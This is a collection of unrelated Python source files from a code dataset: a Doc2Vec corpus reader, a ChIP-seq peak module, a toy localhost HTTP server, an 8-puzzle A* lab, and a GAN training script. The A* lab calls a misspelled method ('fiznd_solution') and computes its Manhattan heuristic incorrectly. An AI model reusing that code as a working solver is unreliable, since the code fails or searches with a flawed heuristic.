open(fpath, encoding=self.__encoding):\n if len(line) == 0:\n continue\n line = TV_Utility.pre_process_sentence([line], language=self.__language, is_remove_stopword=self.__is_remove_stopword)[0]\n tokens = ViTokenizer.tokenize(line).split()\n words = words + tokens\n yield gensim.models.doc2vec.TaggedDocument(words, [tag])\n except Exception as e:\n print(e, fpath)\n\n def __get_file_paths_and_tags(self, root):\n \"\"\" Get all files path in folder and assign each path with a unique number\n Args:\n root (str): location of root folder\n Returns:\n path_tags (dict of path:id): list of all files path in {root} folder\n and its ID\n \"\"\"\n def __get_file(__root, __path_tags, __tag):\n for fname in os.listdir(__root):\n full_path = os.path.join(__root, fname)\n if os.path.isdir(full_path):\n __path_tags, __tag = __get_file(full_path, __path_tags, __tag)\n else:\n __path_tags[full_path] = __tag\n __tag += 1\n return __path_tags, __tag\n\n tag = 0\n path_tags = {}\n path_tags, tag = __get_file(root, path_tags, tag)\n return path_tags\n\nclass EpochLogger(CallbackAny2Vec):\n '''Callback to log information about training'''\n\n def __init__(self):\n self.epoch = 0\n\n def on_epoch_begin(self, model):\n self.__start = time.time()\n print(\"Epoch #{} start\".format(self.epoch))\n\n def on_epoch_end(self, model):\n t = time.time() - self.__start\n print(\"Epoch #{} end\".format(self.epoch))\n print(\"Time = \", t)\n self.epoch += 1\n\nif __name__ == '__main__':\n MySentences('../../../')","sub_path":"Nlp_Model/Model/Doc2Vec/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"346416847","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nmanorm.peak\n~~~~~~~~~~~\n\nThis module contains classes and functions for peak-related operations.\n\"\"\"\n\nfrom __future__ import absolute_import, division\n\nimport logging\nimport os\nfrom math import exp, log\n\nfrom manorm.compat import filter, range\nfrom manorm.exceptions import UnsupportedFormatError\nfrom manorm.peak.parsers import BEDParser, BEDSummitParser, MACS2Parser, MACSParser, NarrowPeakParser\n\nlogger = logging.getLogger(__name__)\n\nPEAK_FORMATS = ['bed', 'bed-summit', 'macs', 'macs2', 'narrowpeak', 'broadpeak']\nPEAK_PARSERS = {'bed': BEDParser, 'bed-summit': BEDSummitParser, 'macs': MACSParser, 'macs2': MACS2Parser,\n 'narrowpeak': NarrowPeakParser}\n\n\nclass Peak(object):\n \"\"\"Class for a single peak.\"\"\"\n\n def __init__(self, chrom, start, end, summit=None):\n \"\"\"Initialize a peak.\n\n :param chrom: The chromosome name of the peak.\n :param start: The start coordinate of the peak (0-based).\n :param end: The end coordinate of the peak (0-based).\n :param summit: The summit coordinate of the peak (0-based).\n \"\"\"\n self.chrom = chrom\n self.start = int(start)\n self.end = int(end)\n if summit is not None:\n self.summit = int(summit)\n else:\n self.summit = (self.start + self.end) // 2\n if not self.start <= self.summit <= self.end:\n raise ValueError(\"peak start must be <= summit and < end, got start={}, summit={}, end={}\".format(\n self.start, self.summit, self.end))\n self.type = None\n self.summit_dis = None\n self.read_count1 = None\n self.read_count2 = None\n self.read_density1 = None\n self.read_density2 = None\n self.m_value = None\n self.a_value = None\n self.normed = False\n self.read_density1_normed = None\n self.read_density2_normed = None\n self.m_value_normed = None\n self.a_value_normed = None\n self.p_value = None\n\n def count_reads(self, reads1, reads2, window_size=2000):\n \"\"\"Count reads and calculate the read density.\"\"\"\n if window_size <= 0:\n raise ValueError(\"window size must be > 0\")\n extend = window_size // 2\n self.read_count1 = reads1.count(self.chrom, self.summit - extend, self.summit + extend) + 1 # add a pseudo 1\n self.read_count2 = reads2.count(self.chrom, self.summit - extend, self.summit + extend) + 1\n self.read_density1 = self.read_count1 * 1000 / (extend * 2)\n self.read_density2 = self.read_count2 * 1000 / (extend * 2)\n\n def cal_ma_value(self):\n \"\"\"Calculate the M value and A value based on read densities.\"\"\"\n self.m_value = log(self.read_density1, 2) - log(self.read_density2, 2)\n self.a_value = (log(self.read_density1, 2) + log(self.read_density2, 2)) / 2\n\n def normalize(self, ma_params):\n \"\"\"Normalize M value and A value by robust linear model.\n ma_model: y = ma_params[1] * x + ma_params[0]\n \"\"\"\n\n def _cal_p_value(x, y):\n \"\"\"Calculate P value with given read densities.\"\"\"\n\n def _log_factorial(n):\n num = 0\n for i in range(1, n + 1):\n num += log(i)\n return num\n\n if x < 0 or y < 0:\n raise ValueError(\"x and y must be >= 0\")\n x = int(round(x))\n if x == 0:\n x = 1\n y = int(round(y))\n if y == 0:\n y = 1\n # use the log-transform to calculate p-value\n log_p = _log_factorial(x + y) - _log_factorial(x) - _log_factorial(y) - (x + y + 1) * log(2)\n if log_p < -500:\n log_p = -500\n p_value = exp(log_p)\n return p_value\n\n self.m_value_normed = round(self.m_value - (ma_params[0] + ma_params[1] * self.a_value), 5)\n self.a_value_normed = round(self.a_value, 5)\n self.read_density1_normed = round(2 ** (self.a_value_normed + self.m_value_normed / 2), 5)\n self.read_density2_normed = round(2 ** (self.a_value_normed - self.m_value_normed / 2), 5)\n self.p_value = _cal_p_value(self.read_density1_normed, self.read_density2_normed)\n self.normed = True\n\n def __repr__(self):\n return \"Peak({}:{}-{})\".format(self.chrom, self.start, self.end)\n\n\nclass Peaks(object):\n \"\"\"Class for a collection of peaks.\n Peaks are stored by a dict under ``self.data`` with chromosome names as keys and lists of :class:`Peak` as values.\n \"\"\"\n\n def __init__(self, name=None):\n \"\"\"Initialize the peak set.\n\n :param name: The name of the peak set.\n \"\"\"\n self.name = name\n self.data = {}\n\n @property\n def chroms(self):\n \"\"\"Return the chromosome names of peaks.\"\"\"\n return list(self.data.keys())\n\n @property\n def size(self):\n \"\"\"Return the number of peaks.\"\"\"\n return sum(len(self.data[chrom]) for chrom in self.chroms)\n\n def add(self, peak):\n \"\"\"Add a peak.\n\n :param peak: An instance of :class:`Peak` to be added.\n \"\"\"\n if not isinstance(peak, Peak):\n raise ValueError(\"requires a 'Peak' object to be added into peaks\")\n else:\n self.data.setdefault(peak.chrom, [])\n self.data[peak.chrom].append(peak)\n\n def sort(self, by='start', ascending=True):\n \"\"\"Sort peaks.\n\n :param by: Attribute name to sort by. Defaults to ``'start'``.\n :param ascending: Sort ascending or descending. Defaults to ``True``.\n \"\"\"\n for chrom in self.chroms:\n self.data[chrom].sort(key=lambda x: getattr(x, by), reverse=not ascending)\n\n def fetch(self, chrom):\n \"\"\"Fetch peaks from specified chromosome.\n\n :param chrom: Chromosome name to fetch peaks from.\n \"\"\"\n if chrom in self.data:\n return self.data[chrom]\n else:\n return []\n\n @property\n def n_common(self):\n \"\"\"Return the number of common peaks.\"\"\"\n return sum(sum(1 for _ in filter(lambda x: x.type == 'common', self.fetch(chrom))) for chrom in self.chroms)\n\n @property\n def n_unique(self):\n \"\"\"Return the number of unique peaks.\"\"\"\n return sum(sum(1 for _ in filter(lambda x: x.type == 'unique', self.fetch(chrom))) for chrom in self.chroms)\n\n def __repr__(self):\n return \"Peaks(name={})\".format(self.name)\n\n\ndef load_peaks(path, format='bed', name=None):\n \"\"\"Read peaks from file.\n\n :param path: The file path to read peaks from.\n :param format: Format of peaks file.\n :param name: Name of peaks.\n \"\"\"\n logger.debug(\"Loading peaks from {}\".format(path))\n if name is None:\n name = os.path.splitext(os.path.basename(path))[0]\n peaks = Peaks(name=name)\n try:\n peak_parser = PEAK_PARSERS[format](path)\n except KeyError:\n raise UnsupportedFormatError(format=format)\n for chrom, start, end, summit in peak_parser.parse():\n peaks.add(Peak(chrom=chrom, start=start, end=end, summit=summit))\n peak_parser.close()\n peaks.sort()\n logger.debug(\"Loaded {} peaks\".format(peaks.size))\n return peaks\n","sub_path":"manorm/peak/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"67356654","text":"from socket import *\n\n\"\"\"\nThis example opens a socket that listens to localhost port 9000.\nIt can respond to 1 call and queue up another 4.\nIt continuously trys to accept incoming requests and blocks execition until it does.\nOnce it recieves a request it prints it and replies with encoded Hello World Html\n\nAfter execution you may wish to kill a process if a resource is hanging.\nps -fA | grep python\nkill -9 \n\nIf you access this from a web browser, you'll get the favicon request.\nBut if you use a simple client where that request ins't baked in, you wont.\n\"\"\"\n\ndef createServer():\n server_socket = socket(AF_INET, SOCK_STREAM) #make socket to recieve client message\n server_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) #hack to let server re-run without address\n try:\n server_socket.bind(('localhost', 9000)) #this program consumes port 9000\n server_socket.listen(5) #Queue 4 more calls if this socket is busy\n\n # keep serving many requests until execution is ended via error or interrupt\n while True:\n\n #this is a blocking call\n #code will NOT proceed any further until there is something to accept.\n client_socket, address = server_socket.accept()\n\n #after something has been accepted, proceed to parse, log and respond.\n request_data = client_socket.recv(5000).decode().split(\"\\n\")\n if len(request_data) > 0:\n for line in request_data:\n print(line)\n\n # construct response\n data = \"HTTP/1.1 200 OK\\r\\nContent-Type: text/html; charset=utf-8\\r\\n\\r\\n\"\n data += \"Hello World\\r\\n\\r\\n\"\n\n # send encoded response and shutdown connection.\n client_socket.sendall(data.encode())\n client_socket.shutdown(SHUT_WR)\n\n except KeyboardInterrupt:\n print(\"\\nShutting down..\\n\")\n\n except Exception as e:\n print(\"Error:\\n\")\n print(e)\n\n # cleanup the socket when function is closing.\n server_socket.close()\n\n#print convinient url to terminal\nprint('Access http://localhost:9000')\ncreateServer()\n","sub_path":"SimpleBrowserServerAndClient/2_simple_server.py","file_name":"2_simple_server.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"431777855","text":"#Program Code :\nfrom time import time\nfrom queue import PriorityQueue\nimport math\n#Creating a class Puzzle\nclass Puzzle:\n #Setting the goal state of 8-puzzle\n goal_state=[1,2,3,8,0,4,7,6,5]\n #Setting up the members of a class\n heuristic=None\n evaluation_function=None\n needs_hueristic=True\n num_of_instances=0\n #constructor to initialize the class members\n def __init__(self,state,parent,action,path_cost,needs_hueristic=False):\n self.parent=parent\n self.state=state\n self.action=action\n #TODO: calculate the path_cost as the sum of its parent cost and path_cost\n if parent:\n self.path_cost = parent.path_cost+path_cost\n else:\n self.path_cost = path_cost\n if needs_hueristic:\n self.needs_hueristic=True\n self.generate_heuristic()\n #TODO: calculate the expression as f = g + h\n self.evaluation_function=self.path_cost+self.heuristic\n #TODO: incrementing the number of instance by 1\n Puzzle.num_of_instances+=1\n \n #method used to display a state of 8-puzzle\n def __str__(self):\n return str(self.state[0:3])+'\\n'+str(self.state[3:6])+'\\n'+str(self.state[6:9])\n\n #method used to generate a heuristic value\n def generate_heuristic(self):\n self.heuristic=0\n for num in range(1,9):\n #TODO: calculate the heuristic value as manhattan distance which is the absolute \n \n #difference between current state and goal state. \n #Use index() method to get the index of num in state\n distance=abs(self.state.index(num) -self.goal_state.index(num))\n i=int(distance/3)\n j=int(distance%3)\n self.heuristic=self.heuristic+i+j\n\n def goal_test(self):\n #TODO: include a condition to compare the current state with the goal state\n if self.state == self.goal_state:\n return True\n return False\n\n @staticmethod\n def find_legal_actions(i,j):\n #find the legal actions as Up, Down, Left, Right based on each cell of state\n legal_action = ['U', 'D', 'L', 'R']\n if i == 0: # up is disable\n # if row is 0 in board then up is disable\n legal_action.remove('U')\n elif i == 2: \n legal_action.remove('D')\n if j == 0:\n legal_action.remove('L')\n elif j == 2:\n legal_action.remove('R')\n #TODO: return legal_action\n return legal_action\n\n #method to generate the child of the current state of the board\n def generate_child(self):\n #TODO: create an empty list\n children=[]\n x = self.state.index(0)\n #TODO: generate the row (i) & col (j) position based on the current index of 0 on the board \n i = int(x/3)\n j = int(x%3)\n #TODO: call the method to find the legal actions based on i and j values\n legal_actions=self.find_legal_actions(i,j);\n\n for action in legal_actions:\n new_state = self.state.copy()\n #if the legal action is UP\n if action == 'U':\n #Swapping between current index of 0 with its up element on the board\n new_state[x], new_state[x-3] = new_state[x-3], new_state[x]\n elif action == 'D':\n #TODO: Swapping between current index of 0 with its down element on the board\n new_state[x], new_state[x+3] = new_state[x+3], new_state[x]\n elif action == 'L':\n #TODO: Swapping between the current index of 0 with its left element on the board\n new_state[x], new_state[x-1] = new_state[x-1], new_state[x]\n elif action == 'R':\n #TODO: Swapping between the current index of 0 with its right element on the board\n new_state[x], new_state[x+1] = new_state[x+1], new_state[x]\n #TODO: Append the new_state of Puzzle object with parent, action,path_cost is 1, its needs_hueristic flag\n children.append(Puzzle(new_state,self,action,1,self.needs_hueristic ))\n \n #TODO: return the children\n return children\n \n #method to find the solution\n def find_solution(self):\n solution = []\n solution.append(self.action)\n path = self\n while path.parent != None:\n path = path.parent\n solution.append(path.action)\n solution = solution[:-1]\n solution.reverse()\n return solution\n#method for A-star search\n#TODO: pass the initial_state as parameter to the breadth_first_search method\ndef Astar_search(initial_state):\n count=0\n #TODO: create an empty list of explored nodes\n explored=[]\n #TODO: create a instance of Puzzle as initial_state, None, None, 0, True\n start_node=Puzzle(initial_state,None,None,0,True)\n q = PriorityQueue()\n #TODO: put a tuple with start_node.evaluation_function, count, start_node into PriorityQueue\n q.put((start_node.evaluation_function, count, start_node))\n\n while not q.empty():\n #TODO: get the current node of a queue. Use the get() method of Queue\n node=q.get() \n #TODO: extract the current node of a PriorityQueue based on the index of a tuple. \n #Refer a tuple format put in PriorityQueue \n node=node[2]\n #TODO: Append the state of node in the explored list as node.state\n explored.append(node.state)\n if node.goal_test():\n return node.fiznd_solution()\n #TODO: call the generate_child method to generate the child node of current node\n children=node.generate_child()\n for child in children:\n if child.state not in explored:\n count += 1\n #TODO: put a tuple with child.evaluation_function, count, child into PriorityQueue\n q.put((child.evaluation_function,count, child))\n return\n#Start executing the 8-puzzle with setting up the initial state\n#Here we have considered 3 initial state intitalized using state variable\nfrom time import time\nfrom queue import PriorityQueue\nimport math\nstate=[[1, 0, 2,\n 6, 8, 4,\n 7, 3, 5],\n\n [2, 8, 3,\n 1, 6, 4,\n 7, 0, 5],\n\n [2, 8, 1,\n 4, 6, 3,\n 0, 7, 5]]\n#Iterate over number of initial_state\nfor i in range(0,3):\n #TODO: Initialize the num_of_instances to zero\n Puzzle.num_of_instances = 0\n #Set t0 to current time\n t0 = time()\n astar = Astar_search(state[i])\n #Get the time t1 after executing the breadth_first_search method\n t1 = time() - t0\n print('A*:',astar)\n print('space:', Puzzle.num_of_instances)\n print('time:', t1)\n print()\n print('------------------------------------------')\n","sub_path":"AstarLab1.py","file_name":"AstarLab1.py","file_ext":"py","file_size_in_byte":6766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"507192982","text":"\"\"\"Test `AnoGAN` Interactively.\n\"\"\"\n\n# %% Pre-load ----------------------------------------------------------------\n\nimport tensorflow as tf\nimport os\nimport shutil\nprint(os.getcwd())\nif os.getcwd().split('/')[-1] != 'dcgan':\n os.chdir('../git/dcgan')\n\n# !python download.py celebA\n\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom skimage.io import imread_collection, imsave\nfrom skimage.transform import resize\nfrom sklearn.model_selection import train_test_split\n\n# %% Data Preprocessing ------------------------------------------------------\n\n# from glob import glob\n# import shutil\n#\n# # sample_list = [\n# # 1000,\n# # 3000,\n# # 5000,\n# # 10000,\n# # 50000,\n# # 100000,\n# # ]\n# #\n# # origin_list = glob('./data/celebA/*.jpg')\n# # for _ in sample_list:\n# # alist = origin_list[:_]\n# #\n# # newdir_name = './data/celebA_%s' % _\n# # if os.path.isdir(newdir_name):\n# # shutil.rmtree(newdir_name)\n# # os.makedirs(newdir_name, exist_ok=True)\n# # [shutil.copy2(file, './data/celebA_%s/' % _) for file in alist]\n#\n#\n# origin_path = './data/celebA'\n# origin_list = glob(origin_path + '/*.jpg')\n# origin_data = imread_collection(\n# load_pattern=origin_list,\n# )\n#\n# def center_crop(image, size=(128, 128)):\n# xcrop, ycrop = size\n# ysize, xsize, chan = image.shape\n# xoff = (xsize - xcrop) // 2\n# yoff = (ysize - ycrop) // 2\n# cropped = image[yoff:-yoff,xoff:-xoff]\n# return cropped\n#\n# cropped = map(lambda img: center_crop(img, size=(64, 64)), origin_data)\n#\n# resized = np.array(\n# list(map(lambda img: resize(\n# img,\n# (64, 64),\n# preserve_range=False,\n# anti_aliasing=True,\n# mode='reflect',\n# ),\n# cropped\n# )\n# ),\n# dtype=np.float32,\n# )\n#\n#\n# sample_list = [\n# 1000,\n# 3000,\n# 5000,\n# 10000,\n# 50000,\n# 100000,\n# ]\n#\n# for _ in sample_list:\n# alist = resized[:_]\n#\n# newdir_name = './data/celebA_cropped_%s' % _\n# if os.path.isdir(newdir_name):\n# shutil.rmtree(newdir_name)\n# os.makedirs(newdir_name, exist_ok=True)\n# [imsave(\n# newdir_name + '/cropped_%s.png' % str(i).zfill(len(str(_))),\n# img,\n# ) for i, img in enumerate(alist)]\n\n# %% -------------------------------------------------------------------------\n\n# %%\n# data_x = imread_collection(\n# #load_pattern='./data/celebA/*.jpg',\n# #load_pattern='./data/celebA_1000/*.jpg',\n# #load_pattern='./data/celebA_3000/*.jpg',\n# #load_pattern='./data/celebA_5000/*.jpg',\n# #load_pattern='./data/celebA_10000/*.jpg',\n# #load_pattern='./data/celebA_50000/*.jpg',\n# #load_pattern='./data/celebA_100000/*.jpg',\n# load_pattern='./data/celebA_cropped_100000/*.png',\n# )\n# data_x = (np.array(data_x) - .5) * 2.\n#\n# plt.imshow(data_x[0])\n# print('`data_x` is ready:', data_x.shape, data_x.dtype)\n#\n#\n# data_x[0].shape\n# data_x[0].mean(axis=0).astype(np.float32)\n# data_x[0].min(axis=0).astype(np.float32)\n# data_x[0].max(axis=0).astype(np.float32)\n# data_x[0].std(axis=0).astype(np.float32)\n\n\nfrom glob import glob\n\n\n#data_x_filenames = glob('/Users/soheehwang/Downloads/DCGAN-tensorflow-master/samples/*.png')\n# data_x = glob('./data/celebA/*.jpg')\ndata_x = glob('./data/data_crop_256_jpg/*.jpg')\n# plt.imshow(data_x[0])\nprint('`data_x` is ready:', len(data_x))\n\n\n# data_z = np.random.normal(\n# loc=0.,\n# scale=1.,\n# size=(len(data_x), 100),\n# )\ndata_z = np.random.uniform(\n low=0.,\n high=1.,\n size=(len(data_x), 64),\n).astype(np.float32)\n\nprint('`data_z` is ready:', data_z.shape, data_z.dtype)\n\ndata_onevector = np.ones_like(data_z)\n\n(train_x, test_x,\n train_z, test_z,\n train_onevector, test_onevector) = train_test_split(\n data_x,\n data_z,\n data_onevector,\n test_size=.2,\n)\n\n\n# %% AnoGAN: Build -----------------------------------------------------------\n\nimport importlib\nfrom src.began import began as BeGAN\nimportlib.reload(BeGAN)\nBEGAN = BeGAN.BEGAN\n\ntf.reset_default_graph()\nbegan = BEGAN(\n input_x_ext='jpg',\n input_x_dtype=tf.float32,\n input_z_dtype=tf.float32,\n input_x_shape=(None, 256, 256, 3),\n input_z_shape=(None, 64),\n use_gpu=True,\n #input_width=64,\n #input_height=64,\n #input_channel=3,\n # output_width=None,\n # output_height=None,\n # output_channel=None,\n # class_num=1,\n filter_dim=64, # 128\n # g_filter_dim=64,\n # d_filter_dim=64,\n g_fc_dim=1024,\n d_fc_dim=1024,\n batch_size=64,\n batch_norm_ok=False,\n conv_activation=tf.nn.elu,\n dropout=None,\n lr_decaying=True,\n decay_lr_step=100_000,\n buffer_size=1000,\n learning_rate=0.0005,\n adam_beta1=.5,\n adam_beta2=.9,\n validation_ratio=.2,\n ano_lambda_=.1,\n)\n\n# %% AnoGAN: Train DCGAN -----------------------------------------------------\n\nshutil.rmtree('./model_save/began_origin', ignore_errors=True)\n\n# %%\n\nbegan.train_BEGAN(\n #input_x=train_x,\n input_x_filenames=train_x,\n input_z=train_z,\n batch_size=16,\n epoch_num=5,\n validation_ratio=.05,\n learning_rate=.0001,\n lambda_val=.001,\n gamma_val=.7,\n model_save_dir='./model_save/began_origin',\n #pre_trained_path='./model_save/began_origin',\n pre_trained_path=None,\n verbose=True,\n #writer=None,\n)\n\n\n# %% AnoGAN: Train DCGAN -----------------------------------------------------\n\nbegan.train_BEGAN(\n #input_x=train_x,\n input_x_filenames=train_x,\n input_z=train_z,\n batch_size=32,\n epoch_num=50,\n validation_ratio=.05,\n learning_rate=.0003,\n lambda_val=.001,\n gamma_val=.7,\n model_save_dir='./model_save/began_origin',\n pre_trained_path='./model_save/began_origin',\n #pre_trained_path=None,\n verbose=True,\n #writer=None,\n)\n\n\n# %% AnoGAN: Evaluate DCGAN --------------------------------------------------\n\ngen_x = began.evaluate_BEGAN(\n input_z=test_z[:1],\n pre_trained_path='model_save_dcgan_origin',\n target_epoch=5,\n)\ntest_z[0]\ngen_x.shape\ngen_x[0].min()\ngen_x[0].max()\nimg = gen_x[0]\nimg\n\npred_img = (img + 1.) / 2. * 255\nplt.imshow(gen_x[0])\ntype(gen_x)\n\ngen_x\n\n\n# %% AnoGAN: Train AnoGAN ----------------------------------------------------\n\nbegan.train_BEGAN(\n input_x=train_x,\n input_z=train_onevector,\n epoch_num=1,\n model_save_dir='./model_save_anogan_origin',\n pre_trained_path=None,\n verbose=True,\n writer=None,\n)\n\n\n# %% AnoGAN: Evaluate AnoGAN -------------------------------------------------\n\ngen_x = began.evaluate_BEGAN(\n input_z=test_z[:1],\n pre_trained_path='model_save_dcgan_origin',\n target_epoch=5,\n)\n\n# %% Test Code: tf.data.Dataset ----------------------------------------------\n\nif __name__ == '__main__':\n tf.reset_default_graph()\n X_t = tf.placeholder(tf.int16, (None, 2),\n name='x_tensor_interface')\n Z_t = tf.placeholder(tf.int16, (None, 1),\n name='z_tensor_interface')\n\n dataset = tf.data.Dataset.from_tensor_slices((X_t, Z_t))\n dataset = dataset.shuffle(buffer_size=1000) # reshuffle_each_iteration=True as default.\n dataset = dataset.batch(2)\n dataset = dataset.flat_map(\n lambda data_x, data_z: tf.data.Dataset.zip(\n (\n tf.data.Dataset.from_tensors(data_x),\n tf.data.Dataset.from_tensors(data_z),\n )\n ).repeat(3)\n )\n\n\n data_op = dataset.make_initializable_iterator()\n data_init_op = data_op.initializer\n X_batch, Z_batch = data_op.get_next()\n\n bias_x0 = tf.convert_to_tensor(np.array([1, 2]), dtype=tf.int16)\n bias_z0 = tf.convert_to_tensor(np.array([7]), dtype=tf.int16)\n\n bias_x1 = tf.convert_to_tensor(np.array([10, 11]), dtype=tf.int16)\n bias_z1 = tf.convert_to_tensor(np.array([50]), dtype=tf.int16)\n add1 = tf.nn.bias_add(X_batch, bias_x0)\n add2 = tf.nn.bias_add(Z_batch, bias_z0)\n add3 = tf.nn.bias_add(X_batch, bias_x1)\n add4 = tf.nn.bias_add(Z_batch, bias_z1)\n\n a = np.array([\n [100, 100],\n [200, 200],\n [300, 300],\n [400, 400],\n [500, 500],\n ])\n\n b = np.array([\n [600],\n [700],\n [800],\n [900],\n [600],\n ])\n\n with tf.Session() as sess:\n init_op = tf.global_variables_initializer()\n init_op.run()\n\n for epoch in range(10):\n print('[EPOCH]', epoch+1, '======================')\n sess.run(data_init_op, feed_dict={X_t: a, Z_t: b})\n batch_remains_ok = True\n batch_num = 0\n while batch_remains_ok and (batch_num+1 < 3):\n try:\n for batch_num in range(3): # batch_size=2, num=3\n print('[BATCH]', batch_num+1, '--------------')\n res1 = sess.run(add1)\n # res2 = sess.run(add2)\n # res3, res4 = sess.run([add3, add4])\n res5 = sess.run(add1)\n # res6 = sess.run(add2)\n\n print('res1', res1, '\\n')\n # print(res2)\n # print(res3, '\\n')\n print('res5', res5, '\\n')\n # print(res6, '\\n')\n\n except tf.errors.OutOfRangeError:\n batch_remains_ok = False\n continue\n\n\n\nif __name__ == '__main__':\n tf.reset_default_graph()\n X_t = tf.placeholder(tf.int16, (None, 2),\n name='x_tensor_interface')\n Z_t = tf.placeholder(tf.int16, (None, 1),\n name='z_tensor_interface')\n\n dataset = tf.data.Dataset.from_tensor_slices((X_t, Z_t))\n dataset = dataset.shuffle(buffer_size=1000) # reshuffle_each_iteration=True as default.\n dataset = dataset.batch(2)\n dataset = dataset.flat_map(\n lambda data_x, data_z: tf.data.Dataset.zip(\n (\n tf.data.Dataset.from_tensors(data_x),\n tf.data.Dataset.from_tensors(data_z),\n )\n ).repeat(12)\n )\n\n\n data_op = dataset.make_initializable_iterator()\n data_init_op = data_op.initializer\n X_batch, Z_batch = data_op.get_next()\n\n bias_x0 = tf.convert_to_tensor(np.array([1, 2]), dtype=tf.int16)\n bias_z0 = tf.convert_to_tensor(np.array([7]), dtype=tf.int16)\n\n bias_x1 = tf.convert_to_tensor(np.array([10, 11]), dtype=tf.int16)\n bias_z1 = tf.convert_to_tensor(np.array([50]), dtype=tf.int16)\n add1 = tf.nn.bias_add(X_batch, bias_x0)\n add2 = tf.nn.bias_add(Z_batch, bias_z0)\n add3 = tf.nn.bias_add(X_batch, bias_x1)\n add4 = tf.nn.bias_add(Z_batch, bias_z1)\n\n a = np.array([\n [100, 100],\n [200, 200],\n [300, 300],\n [400, 400],\n [500, 500],\n ])\n\n b = np.array([\n [600],\n [700],\n [800],\n [900],\n [600],\n ])\n\n with tf.Session() as sess:\n init_op = tf.global_variables_initializer()\n init_op.run()\n\n for epoch in range(10):\n print('[EPOCH]', epoch+1, '======================')\n xx, zz = sess.run(data_init_op, feed_dict={X_t: a, Z_t: b})\n\n print(xx)\n print(zz)\n\n\n# %% Test Code: tf.train.Saver load ------------------------------------------\n\nif __name__ == '__main__':\n\n tf.reset_default_graph()\n with tf.Session() as sess:\n model = tf.train.import_meta_graph('model_save_dcgan_origin/last_weights/after-epoch-2.meta')\n saved_var = 'model_save_dcgan_origin/last_weights/after-epoch-2'\n model.restore(sess, saved_var)\n\n# %% Test Code: reduce_mean --------------------------------------------------\n\nimport tensorflow as tf\nimport numpy as np\n\nif __name__ == '__main__':\n tf.reset_default_graph()\n\n def _layer_linear(\n input_x,\n output_size,\n is_training=True,\n stddev=0.02,\n bias_start=0.,\n dropout=.3,\n return_weight=False,\n reuse=tf.AUTO_REUSE,\n name='linear',\n ):\n\n with tf.variable_scope(name, reuse=reuse):\n\n input_shape = input_x.get_shape().as_list()\n\n weight = tf.get_variable(\n 'weight',\n shape=(input_shape[1], output_size),\n dtype=tf.float32,\n initializer=tf.random_normal_initializer(\n mean=1.,\n stddev=stddev\n ),\n )\n bias = tf.get_variable(\n 'bias',\n shape=(output_size,),\n dtype=tf.float32,\n initializer=tf.constant_initializer(bias_start),\n )\n\n lineared = tf.nn.bias_add(\n input_x @ weight,\n bias,\n data_format='NHWC',\n name='linear_function',\n )\n\n # (Optional) Dropout Layer\n # if dropout:\n #\n # keep_prob = tf.cond(\n # is_training,\n # lambda x: tf.Constant((1. - dropout)),\n # lambda x: tf.Constant(1.),\n # name='choose_prob_if_training'\n # )\n # # TBD: tf.layers.dropout()\n # lineared = tf.nn.dropout(\n # lineared,\n # keep_prob=keep_prob,\n # name='dropout',\n # )\n\n print(name, lineared.get_shape())\n\n if return_weight:\n return lineared, weight, bias\n else:\n return lineared\n\n a = np.arange(10 * 64 * 64 * 3).reshape(-1, 64, 64, 3).astype(np.float32)\n\n a_tensor = tf.convert_to_tensor(a, dtype=tf.float32)\n a_ones_tensor = tf.ones_like(a_tensor, dtype=tf.float32)\n a_ones_subset_tensor = tf.ones_like(a_tensor[:,:], dtype=tf.float32)\n a_sigmoid_tensor = tf.nn.sigmoid(a_tensor)\n a_dense_tensor = tf.layers.dense(a_tensor, 1)\n a_dense_sigmoid_tensor = tf.nn.sigmoid(a_dense_tensor)\n a_reshape_tensor = tf.reshape(\n a_tensor,\n shape=(-1, 64 * 64 * 3),\n )\n a_linear_tensor = _layer_linear(\n a_reshape_tensor,\n output_size=1,\n return_weight=False,\n )\n a_linear_sigmoid_tensor = tf.nn.sigmoid(a_linear_tensor)\n a_linear_sigmoid_ones_tensor = tf.ones_like(a_linear_sigmoid_tensor, dtype=tf.float32)\n\n var_init_op = tf.global_variables_initializer()\n with tf.Session() as sess:\n\n print('a', a.shape)\n print('a_tensor', a_tensor.get_shape())\n print('a_ones_tensor', a_ones_tensor.get_shape())\n print('a_ones_subset_tensor', a_ones_subset_tensor.get_shape())\n print('a_sigmoid_tensor', a_sigmoid_tensor.get_shape())\n print('a_dense_tensor', a_dense_tensor.get_shape())\n print('a_dense_sigmoid_tensor', a_dense_sigmoid_tensor.get_shape())\n print('a_reshape_tensor', a_reshape_tensor.get_shape())\n print('a_linear_tensor', a_linear_tensor.get_shape())\n print('a_linear_sigmoid_tensor', a_linear_sigmoid_tensor.get_shape())\n print('a_linear_sigmoid_ones_tensor', a_linear_sigmoid_ones_tensor.get_shape())\n\n loss = tf.nn.sigmoid_cross_entropy_with_logits(\n logits=a_linear_sigmoid_tensor,\n labels=a_linear_sigmoid_ones_tensor,\n )\n loss_mean = tf.reduce_mean(\n loss\n )\n print(loss.get_shape())\n print(loss_mean.get_shape())\n sess.run(var_init_op)\n print(sess.run(loss))\n print(sess.run(loss_mean))\n","sub_path":"run_began.py","file_name":"run_began.py","file_ext":"py","file_size_in_byte":15518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"248824647","text":"#-*- coding:utf-8 -*\nimport files\n\ndef execute(mob, allEntity) :\n\tif mob[\"AI\"] == \"AItest\" :\n\t\tlog = AItest(mob, allEntity)\n\t\treturn log # dans l'ordre : mob, tout les mobs\n\n\n#######################################\n\"\"\"\nMY AI\n\"\"\"\n########################################\n\n\ndef AItest(mymob, allEntity) :\n\n#on tourne dans un carré\n\tif mymob[\"x\"]>80 :\n\t\tmymob[\"Vx\"] = -1\n\telif mymob[\"x\"]<10 :\n\t\tmymob[\"Vx\"] = 1\n\tif 